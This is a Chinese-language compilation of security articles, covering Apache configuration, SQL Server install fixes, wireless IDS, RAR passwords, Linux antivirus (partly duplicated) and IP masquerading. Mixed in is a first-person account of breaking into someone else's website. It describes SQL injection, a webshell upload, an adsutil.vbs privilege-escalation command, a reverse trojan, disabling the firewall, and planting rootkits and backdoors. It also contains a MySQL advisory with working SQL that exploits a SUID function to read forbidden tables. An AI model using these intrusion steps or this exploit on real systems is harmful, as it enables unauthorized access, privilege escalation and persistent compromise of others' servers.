Apache为管理员提供了很全面的日志管理工具来对服务器的活动进行事后分析。Apache提供了多种不同的记录日志，但是对安全专业人士最重要的是访问日志。这个灵活的工具还具有了相当多的自定义功能，你可以按照你的需要很方便地记录尽可能多或者少的日志，以保证有效的分析。至少，你应该记录那些失败的认证企图和系统产生的错误。使用像AWStats一样的免费工具可以很轻松地完成分析任务。但是必须明确的一点是：监视日志只是一种事后分析手段。你可以利用它回顾和判断对服务器的攻击（和攻击企图），但是希望及时查看日志来对紧急情况做出快速反应是不可能的。如果需要进行预判反应，你应该考虑使用入侵预防系统如信息安全杂志评选的2003年度最新兴技术奖得主：Lucid Security公司的ipAngel系统。

管理文件系统

我们已经讨论了使用（或不使用）.htaccess文件对管理文件访问权限的重要性。禁止通过文件系统许可对Apache服务器进行非授权修改也是很重要的。特别值得一提的是，你应该保证只有根用户才能修改存储在“/usr/local/apache ”目录的文件（或者你选择的任何Apache服务器的根目录）。确保只有根用户才能修改日志文件也很关键，这样可以防止用户掩盖他们的操作。

Apache 服务器日常配置

1、如何设 置请求等待时间

在httpd.conf里面设置：

TimeOut n

其中n为整数，单位是秒。

设置这个TimeOut适用于三种情况：

2、如何接收一个get请求的总时间

接收一个post和put请求的TCP包之间的时间

TCP包传输中的响应（ack）时间间隔

3、如何使得apache监听在特定的端口

修改httpd.conf里面关于Listen的选项，例如：

Listen 8000

是使apache监听在8000端口

而如果要同时指定监听端口和监听地址，可以使用：

Listen 192.170.2.1:80

Listen 192.170.2.5:8000

这样就使得apache同时监听在192.170.2.1的80端口和192.170.2.5的8000端口。

当然也可以在httpd.conf里面设置：

Port 80

这样来实现类似的效果。

4、如何设置apache的最大空闲进程数

修改httpd.conf，在里面设置：

MaxSpareServers n

其中n是一个整数。这样当空闲进程超过n的时候，apache主进程会杀掉多余的空闲进程而保持空闲进程在n，节省了系统资源。如果在一个apache非常繁忙的站点调节这个参数才是必要的，但是在任何时候把这个参数调到很大都不是一个好主意。

同时也可以设置：

MinSpareServers n

来限制最少空闲进程数目来加快反应速度。

5、apache如何设置启动时的子服务进程个数

在httpd.conf里面设置：

StartServers 5

这样启动apache后就有5个空闲子进程等待接受请求。

也可以参考MinSpareServers和MaxSpareServers设置。

6、如何在apache中设置每个连接的最大请求数

在httpd.conf里面设置：

MaxKeepAliveRequests 100

这样就能保证在一个连接中，如果同时请求数达到100就不再响应这个连接的新请求，保证了系统资源不会被某个连接大量占用。但是在实际配置中要求尽量把这个数值调高来获得较高的系统性能。

7、如何在apache中设置session的持续时间

在apache1.2以上的版本中，可以在httpd.conf里面设置：

KeepAlive on

KeepAliveTimeout 15

这样就能限制每个session的保持时间是15秒。session的使用可以使得很多请求都可以通过同一个tcp连接来发送，节约了网络资源和系统资源。

8、如何使得apache对客户端进行域名验证

可以在httpd.conf里面设置：

HostnameLookups on　off　double

如果是使用on，那么只有进行一次反查，如果用double，那么进行反查之后还要进行一次正向解析，只有两次的结果互相符合才行，而off就是不进行域名验证。

如果为了安全，建议使用double；为了加快访问速度，建议使用off。

9、如何使得apache只监听在特定的ip

修改httpd.conf，在里面使用

BindAddress 192.168.0.1

这样就能使得apache只监听外界对192.168.0.1的http请求。如果使用：

BindAddress *

就表明apache监听所有网络接口上的http请求。

当然用防火墙也可以实现。

10、apache中如何限制http请求的消息主体的大小

在httpd.conf里面设置：

LimitRequestBody n

n是整数，单位是byte。cgi脚本一般把表单里面内容作为消息的主体提交给服务器处理，所以现在消息主体的大小在使用cgi的时候很有用。比如使用cgi来上传文件，如果有设置：

LimitRequestBody 102400

那么上传文件超过100k的时候就会报错。

11、如何修改apache的文档根目录

修改httpd.conf里面的DocumentRoot选项到指定的目录，比如：

DocumentRoot /www/htdocs

这样http://localhost/index.html就是对应/www/htdocs/index.html

12、如何修改apache的最大连接数

在httpd.conf中设置：

MaxClients n

n是整数，表示最大连接数，取值范围在1和256之间，如果要让apache支持更多的连接数，那么需要修改源码中的httpd.h文件，把定义的HARD_SERVER_LIMIT值改大然后再编译。

13、如何使每个用户有独立的cgi-bin目录

有两种可选择的方法：

(1)在Apache配置文件里面关于public_html的设置后面加入下面的属性：

ScriptAliasMatch ^/~([^/]*)/cgi-bin/(.*) /home/$1/cgi-bin/$2

(2)在Apache配置文件里面关于public_html的设置里面加入下面的属性：

　　

Options ExecCGI

SetHandler cgi-script

14、如何调整Apache的最大进程数

Apache允许为请求开的最大进程数是256,MaxClients的限制是256.如果用户多了，用户就只能看到Waiting for reply....然后等到下一个可用进程的出现。这个最大数，是Apache的程序决定的--它的NT版可以有1024，但Unix版只有256，你可以在src/include/httpd.h中看到：

#ifndef HARD_SERVER_LIMIT

#ifdef WIN32

#define HARD_SERVER_LIMIT 1024

#else

#define HARD_SERVER_LIMIT 256

#endif

#endif

你可以把它调到1024，然后再编译你的系统。

15、如何屏蔽来自某个Internet地址的用户访问Apache服务器

可以使用deny和allow来限制访问，比如要禁止202.202.202.xx网络的用户访问：

order deny,allow

deny from 202.202.202.0/24　　

16、如何在日志里面记录apache浏览器和引用信息

你需要把mod_log_config编译到你的Apache服务器中，然后使用下面类似的配置：

CustomLog logs/access_log "%h %l %u %t "%r" %s %b "%{Referer}i" "%{User-Agent}i""

17、如何修改Apache返回的头部信息

问题分析：当客户端连接到Apache服务器的时候，Apache一般会返回服务器版本、非缺省模块等信息，例如：

Server: Apache/1.3.26 (Unix) mod_perl/1.26

解决：

你可以在Apache的配置文件里面作如下设置让它返回的关于服务器的信息减少到最少：

ServerTokens Prod

注意：

这样设置以后Apache还会返回一定的服务器信息，比如：

Server: Apache

但是这个不会对服务器安全产生太多的影响，因为很多扫描软件是扫描的时候是不顾你服务器返回的头部信息的。你如果想把服务器返回的相关信息变成：

Server: It iS a nOnE-aPaCHe Server

那么你就要去修改源码了。

黑客实战之对一有防火墙机器的渗透

黑客实战之对一有防火墙机器的渗透

作者：Linzi　来源：赛迪网安全社区

前几天群里的兄弟给了一个网站www.111.com，问我可不可以入侵。

一、踩点

ping www.111.com 发现超时，可以是有防火墙或做了策略。再用superscan扫一下，发现开放的端口有很多个，初步估计是软件防火墙。

二、注入

从源文件里搜索关键字asp，找到了一个注入点。用nbsi注入，发现是sa口令登陆，去加了一个用户，显示命令完成。哈哈，看来管理员太粗心了。先上传一个webshell，上传了一个老兵的asp木马。接下来的就是个人习惯了，我平时入侵的习惯是先上传webshell，然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便，我个人觉得这个方法非常好。

三、提升权限

先看哪些特权的：

cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps

得到：

Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)

"C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll"

"C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll"

"C:\WINNT\system32\msw3prt.dll"

把asp.dll加进去：

cs cript C:\Inetpub\AdminS cripts\adsutil.vbs

set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32

\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32

\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

然后用asp木马加个用户，显示命令完成。

四、TerminalService

接下来就是开3389了，用net start显示，发现已开了TS服务，但端口上没有3389，觉得可能是改端口了。但事实上它们欺骗我的感情，我用netstat -an察看了一下，发现有3389，再从net start 里发现是对方的防火墙搞的鬼。算了，上传个木马吧，上传了一个改了特征码的20CN反弹木马，然后用木马在GUI下关掉了防火墙，再用3389登陆器登了上去，这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候，比较老道的方法大家可以用fpipe实现端口重定向，或者用httptunnel。和黑防里面说的那样，不过我试过没有成功过一次，而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样，不知道谁抄谁。还有一种工具是despoxy，(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下，它可以穿透http代理。

五、简单后门

1.改了FSO名，这样是让我自己享受，这个有system权限的马儿。

2.放了几个rootkit和几个网络上少见的后台。

3.我个从是不喜欢多放后台，觉得很烦。

六、Sniffer

1.TS界面下，下载了些嗅探器。先ARPsniffer图形的看了一下，晕死，没有一台内网机子。又看了一个外网，晕死,整个IP段都是。看来我的运行不错嘛，打开webdavscan查了一下，只有两三个IP是网站，而且是很小型的，接下来就没有什么动力了。

系统安全之安装配置服务器失败的解决

作者：hackmaster　来源：赛迪网安全社区　

安装SQL Server 2000出现如下错误信息：安装文件配置服务器失败。

当你想重装SQL Server，而安装时又出现“您的机子上已经安装有一个实例”的提示时，可以删除program files\Microsoft SQL Server文件夹和注册表信息，再安装。

某某动态链接文件找不到

当出现某某动态链接文件找不到时，可以试着在sql server的安装文件中找到这个文件，复制到系统目录下的system和system32文件夹中（一般在出现这个错误消息时，都会提示哪几个文件夹下缺少这个文件）。

当出现安装程序配置服务器失败时，可以试着用一下方法解决：

此错误消息可以在系统目录下找到，例如我的系统是windowXP，则该文件在C:\WINDOWS

\sqlstp.log。

下面是三种可能的错误：

失败一：

正在与服务?

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 驱动程序的 SQLAllocHandle on SQL_H

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 驱动程序的 SQLAllocHandle on SQL_H

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 驱动程序的 SQLAllocHandle on SQL_H

SQL Server 配置?

13:40:06 Process Exit Code: (-1)

13:40:09 安装程序配置服务器失败。

参考服务器错误日志和 C:\WINNT\sqlstp.log 了解更多信息。

13:40:09 Action CleanUpInstall:

当出现这个错误时，试一下重装系统文件。我的机子是Windows2000，在dos下重新运行Windows2000的安装，然后选择修复，而不是全新安装 。修复系统文件之后，再装sql server，则不会出现此错误消息。

失败二：

正在与服务?

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 未发现数据源

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 未发现数据源

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC 驱动程序 管理器] 未发现数据源

SQL Server 配置?

13:50:07 Process Exit Code: (-1)

13:50:10 安装程序配置服务器失败。

参考服务器错误日志和 C:\WINNT\sqlstp.log 了解更多信息。

13:50:10 Action CleanUpInstall:

当出现这个错误时，是因为在注册表删除了HKEY_LOCAL_MACHINE\SOFTWARE\ODBC中有关sql sever的信息。

失败三：

在与服务?

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC SQL Server Driver][Named Pipes]连接?

[Microsoft][ODBC SQL Server Driver][Named Pipes]ConnectionRead (ReadFile()).

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC SQL Server Driver][Named Pipes]连接?

[Microsoft][ODBC SQL Server Driver][Named Pipes]ConnectionRead (GetOverLappedResult()).

driver={sql server};server=ZHL;UID=sa;PWD=;database=master

[Microsoft][ODBC SQL Server Driver][Named Pipes]连接?

[Microsoft][ODBC SQL Server Driver][Named Pipes]ConnectionRead (GetOverLappedResult()).

SQL Server 配置?

17:17:41 Process Exit Code: (-1)

17:17:45 安装程序配置服务器失败。

参考服务器错误日志和C:\WINDOWS\sqlstp.log 了解更多信息。

当出现这个错误时，是因为在注册表删除了HKEY_LOCAL_MACHINE\SOFTWARE\ODBC中有关sql sever的内容。这时可以选择修复注册表，或安装ODBC修复工具。

通过查看我的机器上生成的sqltp.log文件，发现是第二种错误。

我在“管理工具”下的“数据源（ODBC）” 中没有找到安装ODBC Driver相关内容。产生这个问题的原因是某些使用ODBC数据源的程序，在卸载的时候，会将ODBC Driver的信息都删除掉。

事实上，我们只需要用odbcconf.exe来重新注册一下ODBC Driver就可以了。

在Windows/System32目录下有几个脚本文件，可以来完成驱动程序的注册：

odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\mdaccore.rsp

odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\sqlclnt.rsp

odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\odbcconf.rsp

odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\redist.rsp

通过在dos命令行中运行上述命令，则注册好了ODBC驱动程序。

Odbc是好了，但是再一次重装sql又出现了和第一次同样的问题，我开始有点泄气，后来我把安装盘放进去看了下，发现安装的时候有个高级选项，我点开一看，有rebuild注册表的选项，于是我把注册表备份了一份之后，选择这个选项又做了一次，结果这次我的sql居然可以用了。足足高兴了好几天。

如果经过“高级选项”还不能成功，则建议大家再次运行SQL Server安装程序，这次选择“对现有SQL Server实例进行升级、删除或添加组件”项，“向现有安装中添加组件”。安装完成后运行“企业管理器”，若用户选择的身份验证为：“SQL Server和Windows”，并且在“高级选项”安装过程输入了用户自定义的秘密(注意，在进行“添加组件安装”过程中，将不选择身份验证方式) 中则注册SQL Server时可能会出现如下问题：

---------------------------

SQL Server 企业管理器

---------------------------

未能建立与 ZOU 的连接。

原因：用户 'sa' 登录失败。请验证 SQL Server 是否在运行，并检查SQL Server注册属性（通过右击 ZOU 节点），然后重试。

---------------------------

确定

---------------------------

如果大家在“新建SQL Server注册”时，将sa密码为空时则能成功注册。难道是“添加组件安装”过程中将原来安装时设置的sa密码进行了修改，设为空。

MySQL权限提升及安全限制绕过漏洞

作者：dj5221314　来源：黑客基地

受影响系统：

MySQL AB MySQL

$ mysql -h my.mysql.server -u sample -p -A sample

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;

ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple;

Query OK, 1 row affected (0.00 sec)

2、权限提升

--disable_warnings

drop database if exists mysqltest1;

drop database if exists mysqltest2;

drop function if exists f_suid;

--enable_warnings

# Prepare playground

create database mysqltest1;

create database mysqltest2;

create user malory@localhost;

grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but SUID!) function

create function f_suid(i int) returns int return 0;

grant execute on function test.f_suid to malory@localhost;

use mysqltest2;

# Create table in which malory@localhost will be interested but to which

# he won't have any access

create table t1 (i int);

connect (malcon, localhost, malory,,mysqltest1);

# Correct malory@localhost don't have access to mysqltest2.t1

--error ER_TABLEACCESS_DENIED_ERROR

select * from mysqltest2.t1;

# Create function which will allow to exploit security hole

delimiter |;

create function f_evil ()

returns int

sql security invoker

begin

set @a:= current_user();

set @b:= (select count(*) from mysqltest2.t1);

return 0;

end|

delimiter ;|

# Again correct

--error ER_TABLEACCESS_DENIED_ERROR

select f_evil();

select @a, @b;

# Oops!!! it seems that f_evil() is executed in the context of

# f_suid() definer, so malory@locahost gets all info that he wants

select test.f_suid(f_evil());

select @a, @b;

connection default;

drop user malory@localhost;

drop database mysqltest1;

drop database mysqltest2;

建议：

厂商补丁：MySQL AB

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载。

网络安全之透视无线入侵检测系统

网络安全之透视无线入侵检测系统

作者：hackmaster　来源：赛迪网安全社区

现在随着黑客技术的提高，无线局域网(WLANs)受到越来越多的威胁。配置无线基站(WAPs)的失误导致会话劫持以及拒绝服务攻击(DoS)都象瘟疫一般影响着无线局域网的安全。无线网络不但因为基于传统有线网络TCP/IP架构而受到攻击，还有可能受到基于电气和电子工程师协会 (IEEE) 发行802.11标准本身的安全问题而受到威胁。为了更好的检测和防御这些潜在的威胁，无线局域网也使用了一种入侵检测系统(IDS)来解决这个问题。以至于没有配置入侵检测系统的组织机构也开始考虑配置IDS的解决方案。这篇文章将为你讲述，为什么需要无线入侵检测系统，无线入侵检测系统的优缺点等问题。

来自无线局域网的安全

无线局域网容易受到各种各样的威胁。象802.11标准的加密方法和有线对等保密（Wired Equivalent Privacy）都很脆弱。在"Weaknesses in the Key Scheduling Algorithm of RC-4" 文档里就说明了WEP key能在传输中通过暴力破解攻击。即使WEP加密被用于无线局域网中，黑客也能通过解密得到关键数据。

黑客通过欺骗（rogue）WAP得到关键数据。无线局域网的用户在不知情的情况下，以为自己通过很好的信号连入无线局域网，却不知已遭到黑客的监听了。随着低成本和易于配置造成了现在的无线局域网的流行，许多用户也可以在自己的传统局域网架设无线基站(WAPs)，随之而来的一些用户在网络上安装的后门程序，也造成了对黑客开放的不利环境。这正是没有配置入侵检测系统的组织机构开始考虑配置IDS的解决方案的原因。或许架设无线基站的传统局域网用户也同样面临着遭到黑客的监听的威胁。

基于802.11标准的网络还有可能遭到拒绝服务攻击(DoS)的威胁，从而使得无线局域网难于工作。无线通讯由于受到一些物理上的威胁会造成信号衰减，这些威胁包括：树，建筑物，雷雨和山峰等破坏无线通讯的物体。象微波炉，无线电话也可能威胁基于802.11标准的无线网络。黑客通过无线基站发起的恶意的拒绝服务攻击(DoS)会造成系统重起。另外，黑客还能通过上文提到的欺骗WAP发送非法请求来干扰正常用户使用无线局域网。

另外一种威胁无线局域网的是ever-increasing pace。这种威胁确实存在，并可能导致大范围地破坏，这也正是让802.11标准越来越流行的原因。对于这种攻击，现在暂时还没有好的防御方法，但我们会在将来提出一个更好的解决方案。

入侵检测

入侵检测系统(IDS)通过分析网络中的传输数据来判断破坏系统和入侵事件。传统的入侵检测系统仅能检测和对破坏系统作出反应。如今，入侵检测系统已用于无线局域网，来监视分析用户的活动，判断入侵事件的类型，检测非法的网络行为，对异常的网络流量进行报警。

无线入侵检测系统同传统的入侵检测系统类似。但无线入侵检测系统加入了一些无线局域网的检测和对破坏系统反应的特性。

无线入侵检测系统可以通过提供商来购买，为了发挥无线入侵检测系统的优良的性能，他们同时还提供无线入侵检测系统的解决方案。如今，在市面上的流行的无线入侵检测系统是Airdefense RogueWatch 和Airdefense Guard。象一些无线入侵检测系统也得到了Linux 系统的支持。例如：自由软件开放源代码组织的Snort-Wireless 和WIDZ 。

架构

无线入侵检测系统用于集中式和分散式两种。集中式无线入侵检测系统通常用于连接单独的sensors ，搜集数据并转发到存储和处理数据的中央系统中。分散式无线入侵检测系统通常包括多种设备来完成IDS的处理和报告功能。分散式无线入侵检测系统比较适合较小规模的无线局域网，因为它价格便宜和易于管理。当过多的sensors需要时有着数据处理sensors花费将被禁用。所以，多线程的处理和报告的sensors管理比集中式无线入侵检测系统花费更多的时间。

无线局域网通常被配置在一个相对大的场所。象这种情况，为了更好的接收信号，需要配置多个无线基站(WAPs)，在无线基站的位置上部署sensors，这样会提高信号的覆盖范围。由于这种物理架构，大多数的黑客行为将被检测到。另外的好处就是加强了同无线基站(WAPs)的距离，从而，能更好地定位黑客的详细地理位置。

物理回应

物理定位是无线入侵检测系统的一个重要的部分。针对802.11 的攻击经常在接近下很快地执行，因此对攻击的回应就是必然的了,象一些入侵检测系统的一些行为封锁非法的IP。就需要部署找出入侵者的IP,而且,一定要及时。不同于传统的局域网，黑客可以攻击的远程网络,无线局域网的入侵者就在本地。通过无线入侵检测系统就可以估算出入侵者的物理地址。通过802.11的sensor 数据分析找出受害者的,就可以更容易定位入侵者的地址。一旦确定攻击者的目标缩小，特别反映小组就拿出Kismet或Airopeek根据入侵检测系统提供的线索来迅速找出入侵者。

策略执行

无线入侵检测系统不但能找出入侵者,它还能加强策略。通过使用强有力的策略,会使无线局域网更安全。

威胁检测

无线入侵检测系统不但能检测出攻击者的行为，还能检测到rogue WAPS，识别出未加密的802.11标准的数据流量。

为了更好的发现潜在的 WAP目标，黑客通常使用扫描软件。Netstumbler 和Kismet这样的软件来。使用全球卫星定位系统（Global Positioning System ）来记录他们的地理位置。这些工具正因为许多网站对WAP的地理支持而变的流行起来。

比探测扫描更严重的是，无线入侵检测系统检测到的DoS攻击，DoS攻击在网络上非常普遍。DoS攻击都是因为建筑物阻挡造成信号衰减而发生的。黑客也喜欢对无线局域网进行DoS攻击。无线入侵检测系统能检测黑客的这种行为。象伪造合法用户进行泛洪攻击等。

除了上文的介绍，还有无线入侵检测系统还能检测到MAC地址欺骗。它是通过一种顺序分析，找出那些伪装WAP 的无线上网用户。

无线入侵检测系统的缺陷

虽然无线入侵检测系统有很多优点，但缺陷也是同时存在的。因为无线入侵检测系统毕竟是一门新技术。每个新技术在刚应用时都有一些bug，无线入侵检测系统或许也存在着这样的问题。随着无线入侵检测系统的飞速发展，关于这个问题也会慢慢解决。

结论

无线入侵检测系统未来将会成为无线局域网中的一个重要的部分。虽然无线入侵检测系统存在着一些缺陷，但总体上优大于劣。无线入侵检测系统能检测到的扫描，DoS攻击和其他的802.11的攻击，再加上强有力的安全策略，可以基本满足一个无线局域网的安全问题。随着无线局域网的快速发展，对无线局域网的攻击也越来越多，需要一个这样的系统也是非常必要的。

保护好我的系统　拒绝WinRar密码破解

作者：hackmaster　来源：赛迪网安全社区

在RAR压缩工具中，为了保护隐私信息，我们经常会设置各式各样的密码。然而现在很多密码破解工具可以轻松破解掉你在RAR文件中设置的“英文＋数字”形式的密码。这里我们教大家一招，用中文密码来保护RAR文件。

在要加密的文件上右击选择“添加到压缩文件”，在弹出的“压缩文件名和参数”窗口的“高级”选项页中点击“设置密码”按钮。在弹出的“带密码压缩”窗口中，首先勾“显示密码”框，然后选“输入密码”栏中输入中文密码，再根据需要设置好其他参数，即可完成中文密码RAR文件的保护。

如果希望解压或者查看本这样加密过的文件，可以跟以往一样双击该压缩文件。但由于弹出的密码输入窗口中不能直接输入汉字，所以我们必须从其他文本输入窗口(如Windows的Explorer地址栏或记事本等)输入中文密码，然后将其拷贝密码输入窗口的密码输入栏中所以表示密码个数的星号会翻倍。以后，将汉字密码再次粘贴到验证密码输入栏后“确定”即可正常使用。

注意：这种中文密码设置，由于在操作时都使用的是明文(直接显示内容)方式，所以不适宜在公众场合现场使用，否则中文密码极易被人窃取。

操作系统安全之如付对抗Linux系统病毒

操作系统安全之如付对抗Linux系统病毒

作者：hackmaster　来源：赛迪网安全社区

相对于Windows系统而言，Linux稳定、成本低廉，而且非常安全。如果不是超级用户，恶意感染系统文件的程序很难得逞，也很少发现病毒在Linux上传播。但这并不是说Linux就真的无懈可击了。

如今，越来越多的服务器、工作站和个人电脑开始使用Linux，电脑病毒制造者也开始攻击这一系统。尽管我们所熟知的威力强大的计算机病毒并不会损坏Linux服务器，但却可能传播给和它接触的装有Windows系统的计算机。在实际工作中病毒经常栖息于linux系统中，虽然不会对该系统造成什么危害，但是却可以充当windows系统病毒的司令部，使查杀网络中windows系统病毒成为一件非常困难的事情。

一、Linux平台下病毒种类

目前来看，Linux平台下的病毒主要分为以下4大类：

（1）可执行文件型病毒，指能够寄生在文件中的以文件为主要感染对象的病毒。

（2）蠕虫（worm）病毒，Linux平台下的蠕虫病毒极为猖獗，像利用系统漏洞进行传播的ramen、 lion、 Slapper等，这些病毒都感染了大量的Linux系统，造成了巨大的损失。

（3）脚本病毒，多为使用shell脚本语言编写的病毒，这类病毒编写较为简单，但破坏力却同样惊人，像以.sh结尾的脚本文件，一个短短数十行的shell脚本就可以在短时间内感染硬盘中所有的脚本文件。

（4）后门程序，从增加系统超级用户帐号的简单后门，到利用系统服务加载、共享库文件注射、rootkit工具包，甚至可以装载内核模块（LKM）而产生的后门，Linux平台下的后门技术发展非常成熟，隐蔽性强，难以清除，已经成为Linux系统管理员极为头疼的问题。

二、Llinux平台下防毒软件

Linux下的防毒软件主要分成基于开放源代码的防毒软件和商业防毒软件两大部分，前者有德国SEBASTIAN、H+BEDV AntiVir/X公司的Anti Vir Linux，后者包括GeCAD Software 的RAV Anti Virus Desktop For Linux v8等。

另外，尽管Linux桌面应用发展很快，但是命令行(shell) 在Linux中依然有着很强的生命力，因为启动X-Window管理器将还消耗大量系统资源。所以，笔者重点介绍一下如何使用Anti Linux在命令行下查杀病毒。

小提示

Anti Linux是德国SEBASTIAN、H+BEDV AntiVir/X公司的针对Linux的杀毒软件，可以查杀各种蠕虫病毒、引导区病毒、StarOffice宏病毒，最新版本是2.0.9。

相对于Windows系统而言，Linux稳定、成本低廉，而且非常安全。如果不是超级用户，恶意感染系统文件的程序很难得逞，也很少发现病毒在Linux上传播。但这并不是说Linux就真的无懈可击了。

如今，越来越多的服务器、工作站和个人电脑开始使用Linux，电脑病毒制造者也开始攻击这一系统。尽管我们所熟知的威力强大的计算机病毒并不会损坏Linux服务器，但却可能传播给和它接触的装有Windows系统的计算机。在实际工作中病毒经常栖息于linux系统中，虽然不会对该系统造成什么危害，但是却可以充当windows系统病毒的司令部，使查杀网络中windows系统病毒成为一件非常困难的事情。

三 、Linux平台下病毒种类

目前来看，Linux平台下的病毒主要分为以下4大类：

（1）可执行文件型病毒，指能够寄生在文件中的以文件为主要感染对象的病毒。

（2）蠕虫（worm）病毒，Linux平台下的蠕虫病毒极为猖獗，像利用系统漏洞进行传播的ramen、 lion、 Slapper等，这些病毒都感染了大量的Linux系统，造成了巨大的损失。

（3）脚本病毒，多为使用shell脚本语言编写的病毒，这类病毒编写较为简单，但破坏力却同样惊人，像以.sh结尾的脚本文件，一个短短数十行的shell脚本就可以在短时间内感染硬盘中所有的脚本文件。

（4）后门程序，从增加系统超级用户帐号的简单后门，到利用系统服务加载、共享库文件注射、rootkit工具包，甚至可以装载内核模块（LKM）而产生的后门，Linux平台下的后门技术发展非常成熟，隐蔽性强，难以清除，已经成为Linux系统管理员极为头疼的问题。

四、Linux平台下防毒软件

Linux下的防毒软件主要分成基于开放源代码的防毒软件和商业防毒软件两大部分，前者有德国SEBASTIAN、H+BEDV AntiVir/X公司的Anti Vir Linux，后者包括GeCAD Software 的RAV Anti Virus Desktop For Linux v8等。

另外，尽管Linux桌面应用发展很快，但是命令行(shell) 在Linux中依然有着很强的生命力，因为启动X-Window管理器将还消耗大量系统资源。所以，笔者重点介绍一下如何使用Anti Linux在命令行下查杀病毒。

小提示

Anti Linux是德国SEBASTIAN、H+BEDV AntiVir/X公司的针对Linux的杀毒软件，可以查杀各种蠕虫病毒、引导区病毒、StarOffice宏病毒，最新版本是2.0.9。

五、用Samba技术辅助杀毒

我们通常使用Samba来做文件共享，它可以和使用Windows操作系统的计算机很好地协作。从装有Windows的计算机看，Samba的服务器就是网上邻居里显示的一台服务器，我们可以把Windows下的文件保存在这个服务器上面。而且，我们还可以把其他Windows计算机的共享挂到Samba目录下，一起进行病毒查杀。具体步骤如下：

（1）映射网络驱动器

我们知道，在Windows下可以将共享目录映射为网络驱动器，这样就可以把共享目录当成本地文件夹使用。在Linux里也有类似的功能，可以借助于smbmount命令来实现。

首先，在/mnt目录下创建一个目录，假设为/mnt/smb/A1，然后就象本地文件系统一样查杀计算机病毒。

#smbmount//A1/d /mnt/smb/A1

#cd /mnt/smb/A1

#antivir

（2）卸载该映射目录，可以使用umonut命令，然后挂载其他计算机查毒，方法相同，此处不再详细介绍。

六、总结

病毒是非常让网络管理员头疼的东西，因此不管是使用windows操作系统还是linux操作系统，我们都要保持一个好的心态，多上网学习先进知识，通过本篇文章我们学会了多种方法来使用命令行在linux系统中杀毒。这样才能更加得心应手的将病毒赶出我们的网络，让工作和学习生活更加顺利。

使用Linux防火墙伪装来抵住黑客攻击

作者：hackmaster　来源：赛迪网安全社区

防火墙可分为几种不同的安全等级。在Linux中，由于有许多不同的防火墙软件可供选择，安全性可低可高，最复杂的软件可提供几乎无法渗透的保护能力。不过，Linux核心本身内建了一种称作"伪装"的简单机制，除了最专门的黑客攻击外，可以抵挡住绝大部分的攻击行动。

当我们拨号接连上Internet后，我们的计算机会被赋给一个IP地址，可让网上的其他人回传资料到我们的计算机。黑客就是用你的IP来存取你计算机上的资料。Linux所用的“IP伪装”法，就是把你的IP藏起来，不让网络上的其他人看到。有几组IP地址是特别保留给本地网络使用的，Internet骨干路由器并不能识别。像作者计算机的IP是192.168.1.127，但如果你把这个地址输入到你的浏览器中，相信什么也收不到，这是因为Internet骨干是不认得192.168.X.X这组IP的。在其他Intranet上有数不清的计算机，也是用同样的IP，由于你根本不能存取，当然不能侵入或破解了。

那么，解决Internet上的安全问题，看来似乎是一件简单的事，只要为你的计算机选一个别人无法存取的IP地址，就什么都解决了。错！因为当你浏览Internet时，同样也需要服务器将资料回传给你，否则你在屏幕上什么也看不到，而服务器只能将资料回传给在Internet骨干上登记的合法IP地址。

“IP伪装”就是用来解决此两难困境的技术。当你有一部安装Linux的计算机，设定要使用“IP伪装”时，它会将内部与外部两个网络桥接起来，并自动解译由内往外或由外至内的IP地址，通常这个动作称为网络地址转换。

实际上的“IP伪装”要比上述的还要复杂一些。基本上，“IP伪装”服务器架设在两个网络之间。如果你用模拟的拨号调制解调器来存取Internet上的资料，这便是其中一个网络；你的内部网络通常会对应到一张以太网卡，这就是第二个网络。若你使用的是DSL调制解调器或缆线调制解调器(Cable Modem)，那么系统中将会有第二张以太网卡，代替了模拟调制解调器。而Linux可以管理这些网络的每一个IP地址，因此，如果你有一部安装Windows的计算机（IP为192.168.1.25），位于第二个网络上（Ethernet eth1）的话，要存取位于Internet（Ethernet eth0）上的缆线调制解调器（207.176.253.15）时，Linux的“IP伪装”就会拦截从你的浏览器所发出的所有TCP/IP封包，抽出原本的本地地址（192.168.1.25），再以真实地址（207.176.253.15）取代。接着，当服务器回传资料到207.176.253.15时，Linux也会自动拦截回传封包，并填回正确的本地地址（192.168.1.25）。

Linux可管理数台本地计算机，并处理每一个封包，而不致发生混淆。作者有一部安装SlackWare Linux的老486计算机，可同时处理由四部计算机送往缆线调制解调器的封包，而且速度不减少。

